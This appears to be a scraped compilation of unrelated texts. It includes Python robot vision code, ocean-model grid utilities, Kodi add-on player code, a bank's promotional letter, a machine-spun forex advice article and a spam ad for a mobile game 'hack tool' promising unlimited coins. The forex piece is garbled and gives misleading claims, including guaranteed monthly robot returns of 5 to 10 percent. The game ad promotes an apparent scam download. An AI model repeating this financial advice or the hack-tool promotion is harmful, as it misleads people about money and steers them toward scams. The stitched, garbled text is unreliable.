return '$(builddir)/' + self.alias
|
Are you thinking about starting currency trading? If so, there has actually never been a better time than now. You probably have lots of questions on where to begin and what you ought to know, but don’t stress, this article will get you up to speed. Here are suggestions to get begun trading currencies.Pick one area of expertise and discover as much about that subject as possible. Only the individuals who can predict fluctuations in the Forex will achieve success. Start small and select one category to become knowledgeable about such as gold or oil, and get to know that market inside and out. When something occurs that changes the economy, you will right away to understand how the Forex will alter because you are a specialist in that field.When trading in the Forex market, you ought to focus on the locations with the most affordable trading activity. The majority of investors focus on the more unstable currencies with lots of trading activity. Costs are more likely to turn in areas of low trading activity, nevertheless, because supply and need are no longer in balance.Don’ to include yourself in an unpredictable for trade.
durability and some pledge difficult returns. If you select a great robotic you can expect a return of 5 to ten percent a month.A great forex trading suggestion is to try and discover what aspects to drive a particular currency. There are a variety of things that can have a major influence on currency, such as, policy choices and even political modifications. Getting to know these factors will enhance your opportunities of making wise decisions.Using this knowledge, you are most likely to be successful with currency trading. There is no such thing as too much more knowledge. Ideally you have actually discovered the suggestions in this post useful and were able to utilize them to get you started trading on the forex market. Before long, you will be trading as a professional. |
import numpy as np
import itertools
import cv2
from time import sleep
import os
import math
import event
from color_matcher import ColorMatcher
from sensors.sift_matcher import SIFTMatcher
from pixels2coords import pixels2coords, get_distance_from_cup_width
def distance_between_faces(face1, face2):
x1, y1, w1, h1 = face1
x2, y2, w2, h2 = face2
return math.sqrt((x1 + w1/2.0 - x2 - w2/2.0)**2 +
(y1 + h1/2.0 - y2 - h2/2.0)**2)
def distance_to_center(face, size=(640, 480)):
"""
Get the distance from the center of the faces bounding box to the center of
the image.
>>> distance_to_center((270, 200, 20, 20))
50.0
>>> distance_to_center((310, 230, 20, 20))
0.0
>>> distance_to_center((310, 230, 20, 20), (1024, 768))
240.0
"""
x, y, w, h = face
c_x, c_y = x+w/2.0, y+h/2.0
return math.sqrt((c_x - size[0]/2.0)**2+(c_y - size[1]/2.0)**2)
def common_area(face1, face2):
"""
Calculate the percentage of common area for two bounding boxes. Should be 0
for completely different bounding boxes, 1 for the same.
>>> common_area((100, 200, 300, 400), (100, 200, 300, 400))
1.0
>>> common_area((1, 2, 3, 4), (6, 7, 8, 9))
0.0
>>> common_area((100, 100, 100, 100), (150, 100, 100, 100))
0.5
>>> round(common_area((100, 100, 100, 100), (150, 100, 100, 200)), 4)
0.3333
"""
area = (face1[2]*face1[3] + face2[2]*face2[3])/2.0
left = max(face1[0], face2[0])
right = min(face1[0] + face1[2], face2[0]+face2[2])
top = max(face1[1], face2[1])
bottom = min(face1[1]+face1[3], face2[1]+face2[3])
if left < right and top < bottom:
return (right - left)*(bottom-top)/area
return 0.0
class Webcam(event.EventEmitter):
def __init__(self, ev, cam):
self.cap = cv2.VideoCapture(cam)
self.cap.set(3, 1280)
self.cap.set(4, 720)
super(Webcam, self).__init__(ev)
def run(self):
while self.run_flag.is_set():
_, frame = self.cap.read()
self.emit('frame', frame)
k = cv2.waitKey(5) & 0xFF
if k == 27:
break
sleep(0.1)
cv2.destroyAllWindows()
self.cap.release()
MAX_ITER = 15
class FaceDetector(event.DecisionMaker):
def __init__(self, ev):
self.i = MAX_ITER
# If this script doesn't work, first check if the paths to the Haar
# cascades are correct. By default they work on my computer.
# On other computers they can be overwritten by setting the env
# variables FACE_HAAR and PROFILE_HAAR to the appropiate values.
#
self.face = None
self.face_cascade = cv2.CascadeClassifier(os.getenv('FACE_HAAR',
'haarcascades/haarcascade_frontalface_default.xml'
))
self.profile_cascade = cv2.CascadeClassifier(os.getenv('PROFILE_HAAR',
"haarcascades/haarcascade_profileface.xml"
))
super(FaceDetector, self).__init__(ev)
def frame(self, frame):
frame = cv2.resize(frame, None, fx=0.5, fy=0.5,
interpolation=cv2.INTER_AREA)
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
faces = list(self.face_cascade.detectMultiScale(gray, 1.3, 5))
for (x, y, w, h) in faces:
cv2.rectangle(frame, (x, y), (x + w, y + h), (255, 0, 0), 2)
if len(faces):
distances = sorted([(face, distance_to_center(face,
(1280, 1024))) for face in faces],
key=lambda x: x[0][2]*x[0][3]) # Area of face
if self.face is None:
self.face, self.d_c = distances[-1]
else:
distances.sort(key=lambda x: distance_between_faces(x[0],
self.face))
if distance_between_faces(self.face, distances[0][0]) < 50:
self.face, self.d_c = distances[0]
else:
self.emit('face_gone', self.face)
self.i -= 1
if self.i == 0:
self.face = None
self.sleep(0)
cv2.imshow('faces', frame)
return
self.emit('face_pos', tuple(x*2 for x in self.face))
x, y, w, h = self.face
cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)
cv2.imshow('faces', frame)
self.i = MAX_ITER
elif self.face is not None:
self.emit('face_gone', self.face)
self.i -= 1
if self.i == 0:
self.face = None
cv2.imshow('faces', frame)
self.sleep(0)
class TableDetector(event.DecisionMaker):
def __init__(self, ev):
self.ev = ev
self.table_matcher = SIFTMatcher(templ='haarcascades/table.png', min_match_count=20)
super(TableDetector, self).__init__(ev)
def frame(self, frame):
height, width = frame.shape[:2]
frame = cv2.resize(frame, (3*width/4, 3*height/4))
result = self.table_matcher.find_match(frame)
if result is not None:
kp2, matchesMask, dst, good, dst_pts = result
else:
cv2.imshow('frame', frame)
self.sleep(0)
return
frame = cv2.polylines(frame,[np.int32(dst)],True, 255)
cv2.imshow('Table detector', cv2.resize(frame, dsize=None,
fx=0.5, fy=0.5))
self.emit('table_pos', dst)
self.sleep(0)
class CupDetector(event.DecisionMaker):
def __init__(self, ev, cam_angle, cup_color='pahar_mare_albastru'):
self.frames_seen = 0
self.cam_angle = cam_angle
self.cup_color = cup_color
self.blue_cup = ColorMatcher(cup_color)
self.ev = ev
super(CupDetector, self).__init__(ev)
def frame(self, frame):
big_contours = self.blue_cup.find_bboxes(frame)
contours = []
for contour in big_contours:
x, y, X, Y = contour
ratio = float(Y-y)/(X-x+1)
contours.append((x, y, X, Y, 1, 1.2))
for x, y, X, Y in big_contours:
ratio = float(Y-y)/(X-x+1)
cv2.rectangle(frame, (x-2, y-2), (X, Y), (255, 0, 0), 2)
cv2.putText(frame, '%0.3f' % ratio, (x, y+20),
cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255),
thickness=2)
coords_list = []
for x, y, X, Y, matches, ratio in contours:
cv2.rectangle(frame, (x - 2, y - 2), (X, Y), (0, 255, 0), 2)
dist = '%0.2f' % get_distance_from_cup_width(X-x)
coords = pixels2coords((x+X)/2., Y-(X-x), X-x,
cam_angle=self.cam_angle)
cv2.putText(frame, dist, (x, y-20),
cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255),
thickness=2)
cv2.putText(frame, '%0.2f %0.2f %0.2f' % coords, (x, y-50),
cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255),
thickness=2)
if x > 0 and X < frame.shape[1]:
coords_list.append(coords)
coords_list.sort()
for x, y, z in coords_list:
self.frames_seen = min(self.frames_seen + 1, 20)
if self.frames_seen == 20 and x < 400:
print 'cd: Cup appeared: %s' % self.cup_color
self.emit('cup_appeared', (x, y, z))
self.frames_seen = 0
break
#else:
#print 'cd: Cups done: %s' % self.cup_color
#self.emit('cups_done')
cv2.imshow('Cup detector', cv2.resize(frame, dsize=None,
fx=0.5, fy=0.5))
|
When I interview a candidate for any position, I always explain to them that First Liberty is a Community Bank. What does is it mean to be a Community Bank? At First Liberty, we are talking primarily about two things.
First of all, First Liberty Bank strives to be an engaged and vital corporate citizen in the communities in which we are located. We provide financial services, the vast majority of which are provided to individuals and companies that are located in Greater Oklahoma City and Norman, Oklahoma, where our banking offices are located. This does not mean that we never leave these boundaries – sometimes there is a valid reason to do so. But when we are marketing our products and services and when we are calling on potential clients, we are very nearly always focused in our home communities.
We are fortunate to be in The United States of America, where we have the freedom to pursue our business opportunities. We are lucky to be in the Great State of Oklahoma, where we have abundant resources, a reasonable cost of living, and a bunch of great people. We are grateful to be in Greater Oklahoma City and Norman, both vibrant, growing communities where opportunities for success abound.
As grateful corporate citizens, we believe it is our duty to give back to our communities. We support a number of civic and charitable organizations and activities that are such a vital part of our communities and our society as a whole. We do so with our resources, but not just our financial resources. We encourage our staff members to volunteer their time and to provide leadership in organizations and causes that are near and dear to their heart.
Secondly, First Liberty Bank is a community in and of itself. We are a community of people that are striving toward a common goal. Of course, like any for-profit company, we are trying to become a highly profitable business that rewards our owners. But we want more than that.
We are working to build a community of people that will make our company special, and we ask them over and over to do three simple things: Be Kind, Be Genuine, and Bend over Backwards to Serve the Relationships we establish. Though these may seem like ‘soft’ parts of our business plan, I truly believe they are as important a part of the success we have enjoyed as any strategy we have implemented.
If you are ever in need of financial services, think Community, it’s the ONLY way to Bank!
And if you are looking for a Community Bank to open an account or pursue a career, I hope you will give First Liberty Bank a try. We will Be Kind, We will be Genuine, and We Will Bend over Backwards to serve you.
Please don't hesitate to contact me at 405.608.1903 or [email protected] if there is anything I can do for you. |
import numpy as np
import scipy.interpolate
import scipy.spatial
def interpolate(coords, var, interp_coords, missing_value=None, fill=True, kind='linear'):
"""Interpolate globally defined data to a different (regular) grid.
Arguments:
coords: Tuple of coordinate arrays for each dimension.
var (:obj:`ndarray` of dim (nx1, ..., nxd)): Variable data to interpolate.
interp_coords: Tuple of coordinate arrays to interpolate to.
missing_value (optional): Value denoting cells of missing data in ``var``.
Is replaced by `NaN` before interpolating. Defaults to `None`, which means
no replacement is taking place.
fill (bool, optional): Whether `NaN` values should be replaced by the nearest
finite value after interpolating. Defaults to ``True``.
kind (str, optional): Order of interpolation. Supported are `nearest` and
`linear` (default).
Returns:
:obj:`ndarray` containing the interpolated values on the grid spanned by
``interp_coords``.
"""
if len(coords) != len(interp_coords) or len(coords) != var.ndim:
raise ValueError('Dimensions of coordinates and values do not match')
var = np.array(var)
if missing_value is not None:
invalid_mask = np.isclose(var, missing_value)
var[invalid_mask] = np.nan
if var.ndim > 1 and coords[0].ndim == 1:
interp_grid = np.rollaxis(np.array(np.meshgrid(
*interp_coords, indexing='ij', copy=False)), 0, len(interp_coords) + 1)
else:
interp_grid = coords
var = scipy.interpolate.interpn(coords, var, interp_grid,
bounds_error=False, fill_value=np.nan, method=kind)
if fill:
var = fill_holes(var)
return var
def fill_holes(data):
"""A simple inpainting function that replaces NaN values in `data` with the
nearest finite value.
"""
data = data.copy()
shape = data.shape
dim = data.ndim
flag = np.zeros(shape, dtype=bool)
flag[~np.isnan(data)] = True
slcs = [slice(None)] * dim
while np.any(~flag):
for i in range(dim):
slcs1 = slcs[:]
slcs2 = slcs[:]
slcs1[i] = slice(0, -1)
slcs2[i] = slice(1, None)
slcs1 = tuple(slcs1)
slcs2 = tuple(slcs2)
# replace from the right
repmask = np.logical_and(~flag[slcs1], flag[slcs2])
data[slcs1][repmask] = data[slcs2][repmask]
flag[slcs1][repmask] = True
# replace from the left
repmask = np.logical_and(~flag[slcs2], flag[slcs1])
data[slcs2][repmask] = data[slcs1][repmask]
flag[slcs2][repmask] = True
return data
def get_periodic_interval(current_time, cycle_length, rec_spacing, n_rec):
"""Used for linear interpolation between periodic time intervals.
One common application is the interpolation of external forcings that are defined
at discrete times (e.g. one value per month of a standard year) to the current
time step.
Arguments:
current_time (float): Time to interpolate to.
cycle_length (float): Total length of one periodic cycle.
rec_spacing (float): Time spacing between each data record.
n_rec (int): Total number of records available.
Returns:
:obj:`tuple` containing (n1, f1), (n2, f2): Indices and weights for the interpolated
record array.
Example:
The following interpolates a record array ``data`` containing 12 monthly values
to the current time step:
>>> year_in_seconds = 60. * 60. * 24. * 365.
>>> current_time = 60. * 60. * 24. * 45. # mid-february
>>> print(data.shape)
(360, 180, 12)
>>> (n1, f1), (n2, f2) = get_periodic_interval(current_time, year_in_seconds, year_in_seconds / 12, 12)
>>> data_at_current_time = f1 * data[..., n1] + f2 * data[..., n2]
"""
locTime = current_time - rec_spacing * 0.5 + \
cycle_length * (2 - round(current_time / cycle_length))
tmpTime = locTime % cycle_length
tRec1 = 1 + int(tmpTime / rec_spacing)
tRec2 = 1 + tRec1 % int(n_rec)
wght2 = (tmpTime - rec_spacing * (tRec1 - 1)) / rec_spacing
wght1 = 1.0 - wght2
return (tRec1 - 1, wght1), (tRec2 - 1, wght2)
def make_cyclic(longitude, array=None, wrap=360.):
"""Create a cyclic version of a longitude array and (optionally) another array.
Arguments:
longitude (ndarray): Longitude array of shape (nlon, ...).
array (ndarray): Another array that is to be made cyclic of shape (nlon, ...).
wrap (float): Wrapping value, defaults to 360 (degrees).
Returns:
Tuple containing (cyclic_longitudes, cyclic_array) if `array` is given, otherwise
just the ndarray cyclic_longitudes of shape (2 * nlon, ...).
"""
lonsize = longitude.shape[0]
cyclic_longitudes = np.hstack((longitude[lonsize//2:, ...] - wrap, longitude, longitude[:lonsize//2, ...] + wrap))
if array is None:
return cyclic_longitudes
cyclic_array = np.hstack((array[lonsize//2:, ...], array, array[:lonsize//2, ...]))
return cyclic_longitudes, cyclic_array
def get_coastline_distance(coords, coast_mask, spherical=False, radius=None, num_candidates=None, n_jobs=-1):
"""Calculate the (approximate) distance of each water cell from the nearest coastline.
Arguments:
coords (tuple of ndarrays): Tuple containing x and y (longitude and latitude)
coordinate arrays of shape (nx, ny).
coast_mask (ndarray): Boolean mask indicating whether a cell is a land cell
(must be same shape as coordinate arrays).
spherical (bool): Use spherical instead of Cartesian coordinates.
When this is `True`, cyclical boundary conditions are used, and the
resulting distances are only approximate. Cells are pre-sorted by
Euclidean lon-lat distance, and great circle distances are calculated for
the first `num_candidates` elements. Defaults to `False`.
radius (float): Radius of spherical coordinate system. Must be given when
`spherical` is `True`.
num_candidates (int): Number of candidates to calculate great circle distances
for for each water cell. The higher this value, the more accurate the returned
distances become when `spherical` is `True`. Defaults to the square root
of the number of coastal cells.
n_jobs (int): Number of parallel jobs to determine nearest neighbors
(defaults to -1, which uses all available threads).
Returns:
:obj:`ndarray` of shape (nx, ny) indicating the distance to the nearest land
cell (0 if cell is land).
Example:
The following returns coastal distances of all T cells for a spherical Veros setup.
>>> coords = np.meshgrid(self.xt[2:-2], self.yt[2:-2], indexing='ij')
>>> dist = tools.get_coastline_distance(coords, self.kbot > 0, spherical=True, radius=self.radius)
"""
if not len(coords) == 2:
raise ValueError('coords must be lon-lat tuple')
if not all(c.shape == coast_mask.shape for c in coords):
raise ValueError('coordinates must have same shape as coastal mask')
if spherical and not radius:
raise ValueError('radius must be given for spherical coordinates')
watercoords = np.array([c[~coast_mask] for c in coords]).T
if spherical:
coastcoords = np.array(make_cyclic(coords[0][coast_mask], coords[1][coast_mask])).T
else:
coastcoords = np.array((coords[0][coast_mask], coords[1][coast_mask])).T
coast_kdtree = scipy.spatial.cKDTree(coastcoords)
distance = np.zeros(coords[0].shape)
if spherical:
def spherical_distance(coords1, coords2):
"""Calculate great circle distance from latitude and longitude"""
coords1 *= np.pi / 180.
coords2 *= np.pi / 180.
lon1, lon2, lat1, lat2 = coords1[..., 0], coords2[..., 0], coords1[..., 1], coords2[..., 1]
return radius * np.arccos(np.sin(lat1) * np.sin(lat2) + np.cos(lat1) * np.cos(lat2) * np.cos(lon1 - lon2))
if not num_candidates:
num_candidates = int(np.sqrt(np.count_nonzero(~coast_mask)))
i_nearest = coast_kdtree.query(watercoords, k=num_candidates, n_jobs=n_jobs)[1]
approx_nearest = coastcoords[i_nearest]
distance[~coast_mask] = np.min(spherical_distance(approx_nearest, watercoords[..., np.newaxis, :]), axis=-1)
else:
distance[~coast_mask] = coast_kdtree.query(watercoords, n_jobs=n_jobs)[0]
return distance
def get_uniform_grid_steps(total_length, stepsize):
"""Get uniform grid step sizes in an interval.
Arguments:
total_length (float): total length of the resulting grid
stepsize (float): grid step size
Returns:
:obj:`ndarray` of grid steps
Example:
>>> uniform_steps = uniform_grid_setup(6., 0.25)
>>> uniform_steps
[ 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25,
0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25,
0.25, 0.25, 0.25, 0.25, 0.25, 0.25 ]
"""
if total_length % stepsize:
raise ValueError('total length must be an integer multiple of stepsize')
return stepsize * np.ones(int(total_length / stepsize))
def get_stretched_grid_steps(n_cells, total_length, minimum_stepsize, stretching_factor=2.5,
two_sided_grid=False, refine_towards='upper'):
"""Computes stretched grid steps for regional and global domains with either
one or two-sided stretching using a hyperbolic tangent stretching function.
Arguments:
n_cells (int): Number of grid points.
total_length (float): Length of the grid interval to be covered (sum of the
resulting grid steps).
minimum_stepsize (float): Grid step size on the lower end of the interval.
stretching_factor (float, optional): Coefficient of the `tanh` stretching
function. The higher this value, the more abrupt the step sizes change.
two_sided_grid (bool, optional): If set to `True`, the resulting grid will be symmetrical
around the center. Defaults to `False`.
refine_towards ('upper' or 'lower', optional): The side of the interval that is to be refined.
Defaults to 'upper'.
Returns:
:obj:`ndarray` of shape `(n_cells)` containing grid steps.
Examples:
>>> dyt = get_stretched_grid_steps(14, 180, 5)
>>> dyt
[ 5.10517337 5.22522948 5.47813251 5.99673813 7.00386752
8.76808565 11.36450896 14.34977676 16.94620006 18.71041819
19.71754758 20.2361532 20.48905624 20.60911234]
>>> dyt.sum()
180.0
>>> dyt = get_stretched_grid_steps(14, 180, 5, stretching_factor=4.)
>>> dyt
[ 5.00526979 5.01802837 5.06155549 5.20877528 5.69251688
7.14225176 10.51307232 15.20121339 18.57203395 20.02176884
20.50551044 20.65273022 20.69625734 20.70901593]
>>> dyt.sum()
180.0
"""
if refine_towards not in ('upper', 'lower'):
raise ValueError('refine_towards must be "upper" or "lower"')
if two_sided_grid:
if n_cells % 2:
raise ValueError('number of grid points must be even integer number (given: {})'.format(n_cells))
n_cells = n_cells / 2
stretching_function = np.tanh(stretching_factor * np.linspace(-1, 1, n_cells))
if refine_towards == 'lower':
stretching_function = stretching_function[::-1]
if two_sided_grid:
stretching_function = np.concatenate((stretching_function[::-1], stretching_function))
def normalize_sum(var, sum_value, minimum_value=0.):
if abs(var.sum()) < 1e-5:
var += 1
var *= (sum_value - len(var) * minimum_value) / var.sum()
return var + minimum_value
stretching_function = normalize_sum(stretching_function, total_length, minimum_stepsize)
assert abs(1 - np.sum(stretching_function) / total_length) < 1e-5, 'precision error'
return stretching_function
def get_vinokur_grid_steps(n_cells, total_length, lower_stepsize, upper_stepsize=None,
two_sided_grid=False, refine_towards='upper'):
"""Computes stretched grid steps for regional and global domains with either
one or two-sided stretching using Vinokur stretching.
This stretching function minimizes discretization errors on finite difference
grids.
Arguments:
n_cells (int): Number of grid points.
total_length (float): Length of the grid interval to be covered (sum of the
resulting grid steps).
lower_stepsize (float): Grid step size on the lower end of the interval.
upper_stepsize (float or ``None``, optional): Grid step size on the upper end of the interval.
If not given, the one-sided version of the algorithm is used (that enforces zero curvature
on the upper end).
two_sided_grid (bool, optional): If set to `True`, the resulting grid will be symmetrical
around the center. Defaults to `False`.
refine_towards ('upper' or 'lower', optional): The side of the interval that is to be refined.
Defaults to 'upper'.
Returns:
:obj:`ndarray` of shape `(n_cells)` containing grid steps.
Reference:
Vinokur, Marcel, On One-Dimensional Stretching Functions for Finite-Difference Calculations,
Journal of Computational Physics. 50, 215, 1983.
Examples:
>>> dyt = get_vinokur_grid_steps(14, 180, 5, two_sided_grid=True)
>>> dyt
[ 18.2451554 17.23915939 15.43744632 13.17358802 10.78720589
8.53852027 6.57892471 6.57892471 8.53852027 10.78720589
13.17358802 15.43744632 17.23915939 18.2451554 ]
>>> dyt.sum()
180.
>>> dyt = get_vinokur_grid_steps(14, 180, 5, upper_stepsize=10)
>>> dyt
[ 5.9818365 7.3645667 8.92544833 10.61326984 12.33841985
13.97292695 15.36197306 16.3485688 16.80714121 16.67536919
15.97141714 14.78881918 13.27136448 11.57887877 ]
>>> dyt.sum()
180.
"""
if refine_towards not in ('upper', 'lower'):
raise ValueError('refine_towards must be "upper" or "lower"')
if two_sided_grid:
if n_cells % 2:
raise ValueError('number of grid points must be an even integer (given: {})'.format(n_cells))
n_cells = n_cells // 2
n_cells += 1
def approximate_sinc_inverse(y):
"""Approximate inverse of sin(y) / y"""
if y < 0.26938972:
inv = np.pi * (1 - y + y**2 - (1 + np.pi**2 / 6) * y**3 + 6.794732 * y**4 - 13.205501 * y**5 + 11.726095 * y**6)
else:
ybar = 1. - y
inv = np.sqrt(6 * ybar) * (1 + .15 * ybar + 0.057321429 * ybar**2 + 0.048774238 * ybar**3 - 0.053337753 * ybar**4 + 0.075845134 * ybar**5)
assert abs(1 - np.sin(inv) / inv / y) < 1e-2, 'precision error'
return inv
def approximate_sinhc_inverse(y):
"""Approximate inverse of sinh(y) / y"""
if y < 2.7829681:
ybar = y - 1.
inv = np.sqrt(6 * ybar) * (1 - 0.15 * ybar + 0.057321429 * ybar**2 - 0.024907295 * ybar**3 + 0.0077424461 * ybar**4 - 0.0010794123 * ybar**5)
else:
v = np.log(y)
w = 1. / y - 0.028527431
inv = v + (1 + 1. / v) * np.log(2 * v) - 0.02041793 + 0.24902722 * w + 1.9496443 * w**2 - 2.6294547 * w**3 + 8.56795911 * w**4
assert abs(1 - np.sinh(inv) / inv / y) < 1e-2, 'precision error'
return inv
target_sum = total_length
if two_sided_grid:
target_sum *= .5
s0 = float(target_sum) / float(lower_stepsize * n_cells)
if upper_stepsize:
s1 = float(target_sum) / float(upper_stepsize * n_cells)
a, b = np.sqrt(s1 / s0), np.sqrt(s1 * s0)
if b > 1:
stretching_factor = approximate_sinhc_inverse(b)
stretched_grid = .5 + .5 * np.tanh(stretching_factor * np.linspace(-.5, .5, n_cells)) / np.tanh(.5 * stretching_factor)
else:
stretching_factor = approximate_sinc_inverse(b)
stretched_grid = .5 + .5 * np.tan(stretching_factor * np.linspace(-.5, .5, n_cells)) / np.tan(.5 * stretching_factor)
stretched_grid = stretched_grid / (a + (1. - a) * stretched_grid)
else:
if s0 > 1:
stretching_factor = approximate_sinhc_inverse(s0) * .5
stretched_grid = 1 + np.tanh(stretching_factor * np.linspace(0., 1., n_cells)) / np.tanh(stretching_factor)
else:
stretching_factor = approximate_sinc_inverse(s0) * .5
stretched_grid = 1 + np.tan(stretching_factor * np.linspace(0., 1., n_cells)) / np.tan(stretching_factor)
stretched_grid_steps = np.diff(stretched_grid * target_sum)
if refine_towards == 'upper':
stretched_grid_steps = stretched_grid_steps[::-1]
if two_sided_grid:
stretched_grid_steps = np.concatenate((stretched_grid_steps[::-1], stretched_grid_steps))
assert abs(1 - np.sum(stretched_grid_steps) / total_length) < 1e-5, 'precision error'
return stretched_grid_steps
|
Hack Codes rivals HEAVENSTRIKE latest version of the tool is free to download now! Our development team has released a new tool for the new technique of playing HEAVENSTRIKE rivals. With our HEAVENSTRIKE rivals hack engine codes, players can get unlimited coins and cores for iOS and Android platform. Our HEAVENSTRIKE rivals hack codes coach has been tested on many devices. So far there has found no problem. So if you need a quick and more cores on this game, you should get our HEAVENSTRIKE rivals hack codes or function codes for help.
Enjoy a battle system designed especially for mobile devices that’s easy to learn but with deep strategic possibilities, quick-entry player-vs-player combat, and hundreds of unique characters to collect, grow and evolve.
Challenge the world and ascend the rankings until you rule over all!
Searching for Heavenstrike Rivals Hack Tool Online? |
import sys, os
import json
from traceback import print_exc
from xbmcswift2 import xbmc, xbmcgui, xbmcplugin
from meta import plugin
from meta.gui import dialogs
from meta.utils.executor import execute
from meta.utils.properties import set_property
from meta.utils.text import to_unicode, urlencode_path, apply_parameters, to_utf8
from meta.library.tools import get_movie_from_library, get_episode_from_library
from meta.navigation.base import get_icon_path, get_background_path
from meta.play.players import get_players, patch
from meta.play.channelers import get_channelers
from meta.play.lister import Lister
from settings import *
from language import get_string as _
@plugin.cached(TTL=60, cache="trakt")
def get_trakt_ids(*args, **kwargs):
try:
from trakt import trakt
return trakt.find_trakt_ids(*args, **kwargs)
except: return None
def active_players(media, filters={}):
if media == "movies": setting = SETTING_MOVIES_ENABLED_PLAYERS
elif media == "tvshows": setting = SETTING_TV_ENABLED_PLAYERS
elif media == "musicvideos": setting = SETTING_MUSICVIDEOS_ENABLED_PLAYERS
elif media == "music": setting = SETTING_MUSIC_ENABLED_PLAYERS
elif media == "live": setting = SETTING_LIVE_ENABLED_PLAYERS
else: raise Exception("invalid parameter %s" % media)
try: enabled = plugin.get_setting(setting, unicode)
except: enabled = []
return [p for p in get_players(media, filters) if p.id in enabled]
def active_channelers(media, filters={}):
if media == "movies": setting = SETTING_MOVIES_ENABLED_CHANNELERS
elif media == "tvshows": setting = SETTING_TV_ENABLED_CHANNELERS
elif media == "musicvideos": setting = SETTING_MUSICVIDEOS_ENABLED_CHANNELERS
elif media == "music": setting = SETTING_MUSIC_ENABLED_CHANNELERS
elif media == "live": setting = SETTING_LIVE_ENABLED_CHANNELERS
else: raise Exception("invalid parameter %s" % media)
try: enabled = plugin.get_setting(setting, unicode)
except: enabled = []
return [p for p in get_channelers(media, filters) if p.id in enabled]
def action_cancel(clear_playlist=True):
if clear_playlist: xbmc.PlayList(xbmc.PLAYLIST_VIDEO).clear()
plugin.set_resolved_url()
xbmc.executebuiltin('Dialog.Close(okdialog, true)')
def action_activate(link):
xbmc.executebuiltin('Container.Update("%s")' % link)
#action_cancel()
def action_run(link):
if link.startswith("plugin://"): xbmc.executebuiltin('RunPlugin(%s)' % link)
else: xbmc.executebuiltin('RunScript(%s)' % link)
def action_prerun(link):
# xbmc.executebuiltin('ActivateWindow(10025,addons://user/xbmc.addon.video/plugin.video.zen/,return)')
if link.startswith("plugin://"):
id = link.split("/")
xbmc.executebuiltin('RunAddon(%s)' % id[2])
while xbmc.getInfoLabel('Container.PluginName') != id[2] or xbmc.getCondVisibility('Window.IsActive(busydialog)'): xbmc.sleep(250)
xbmc.sleep(250)
xbmc.executebuiltin('Container.Update("%s")' % link)
def action_play(item):
#action_cancel()
plugin.play_video(item)
def action_playmedia(item):
xbmc.executebuiltin('PlayMedia("%s")'%item)
def action_resolve(item):
#plugin.set_resolved_url(item)
action_play(item)
def get_video_link(players, params, mode, use_simple=False):
lister = Lister()
# Extend parameters
for lang, lang_params in params.items():
for key, value in lang_params.items():
if isinstance(value, basestring):
params[lang][key + "_+"] = value.replace(" ", "+")
params[lang][key + "_-"] = value.replace(" ", "-")
params[lang][key + "_escaped"] = value.replace(" ", "%2520")
params[lang][key + "_escaped+"] = value.replace(" ", "%252B")
pDialog = None
selection = None
try:
if len(players) > 1 and use_simple:
index = dialogs.select(_("Play using..."), [player.title for player in players])
if index == -1: return None
players = [players[index]]
resolve_f = lambda p : resolve_player(p, lister, params)
if len(players) > 1:
pool_size = plugin.get_setting(SETTING_POOL_SIZE, int)
populator = lambda : execute(resolve_f, players, lister.stop_flag, pool_size)
selection = dialogs.select_ext(_("Play using..."), populator, len(players))
else:
result = resolve_f(players[0])
if result:
title, links = result
if len(links) == 1: selection = links[0]
else:
index = dialogs.select(_("Play using..."), [x['label'] for x in links])
if index > -1: selection = links[index]
else: dialogs.ok(_("Error"), _("%s not found") % _("Video"))
finally: lister.stop()
return selection
def on_play_video(mode, players, params, trakt_ids=None):
if plugin.get_setting(SETTING_AUTOPATCH, bool) == True: patch("auto")
assert players
# Cancel resolve
action_cancel()
# Get video link
use_simple_selector = plugin.get_setting(SETTING_USE_SIMPLE_SELECTOR, bool)
is_extended = not (use_simple_selector or len(players) == 1)
if not is_extended: xbmc.executebuiltin("ActivateWindow(busydialog)")
try: selection = get_video_link(players, params, mode, use_simple_selector)
finally:
if not is_extended: xbmc.executebuiltin("Dialog.Close(busydialog)")
if not selection: return
# Get selection details
link = selection['path']
action = selection.get('action', '')
plugin.log.info('Playing url: %s' % to_utf8(link))
# Activate link
if action == "ACTIVATE": action_activate(link)
elif action == "RUN": action_run(link)
elif action == "PRERUN": action_prerun(link)
elif action == "PLAYMEDIA": action_playmedia(link)
elif action == "PRERUNRETURN": metaplayer().action_prerun(link)
else:
if trakt_ids: set_property('script.trakt.ids', json.dumps(trakt_ids))
return link
return None
def resolve_player(player, lister, params):
results = []
for command_group in player.commands:
if xbmc.abortRequested or not lister.is_active(): return
command_group_results = []
for command in command_group:
if xbmc.abortRequested or not lister.is_active(): return
lang = command.get("language", "en")
if not lang in params: continue
parameters = params[lang]
try:
link = apply_parameters(to_unicode(command["link"]), parameters)
except:
print_exc()
continue
if link == "movies" and player.media == "movies":
video = get_movie_from_library(parameters['imdb'])
if video:
command_group_results.append(video)
elif link == "tvshows" and player.media == "tvshows":
video = get_episode_from_library(parameters['id'], parameters['season'], parameters['episode'])
if not video:
video = get_episode_from_library(parameters['tmdb'], parameters['season'], parameters['episode'])
if video:
command_group_results.append(video)
elif not command.get("steps"):
command_group_results.append(
{
'label': player.title,
'path': urlencode_path(link),
'action': command.get("action", "PLAY")
}
)
else:
steps = [to_unicode(step) for step in command["steps"]]
files, dirs = lister.get(link, steps, parameters)
if command.get("action", "PLAY") == "ACTIVATE":
files += dirs
if files:
command_group_results += [
{
'label': f['label'],
'path': player.postprocess(f['path']),
'action': command.get("action", "PLAY")
} for f in files]
if command_group_results:
break
results += command_group_results
if results:
return player.title, results
class metaplayer(xbmc.Player):
def __init__(self):
xbmc.Player.__init__(self)
self.returnlink = xbmc.getInfoLabel('Container.FolderPath')
xbmc.log("returnlink: " + repr(self.returnlink), xbmc.LOGNOTICE)
def action_prerun(self, link):
# xbmc.executebuiltin('ActivateWindow(10025,addons://user/xbmc.addon.video/plugin.video.zen/,return)')
if link.startswith("plugin://"):
id = link.split("/")
xbmc.executebuiltin('RunAddon(%s)' % id[2])
while xbmc.getInfoLabel('Container.PluginName') != id[2] or xbmc.getCondVisibility('Window.IsActive(busydialog)'): xbmc.sleep(250)
xbmc.sleep(250)
self.play(link)
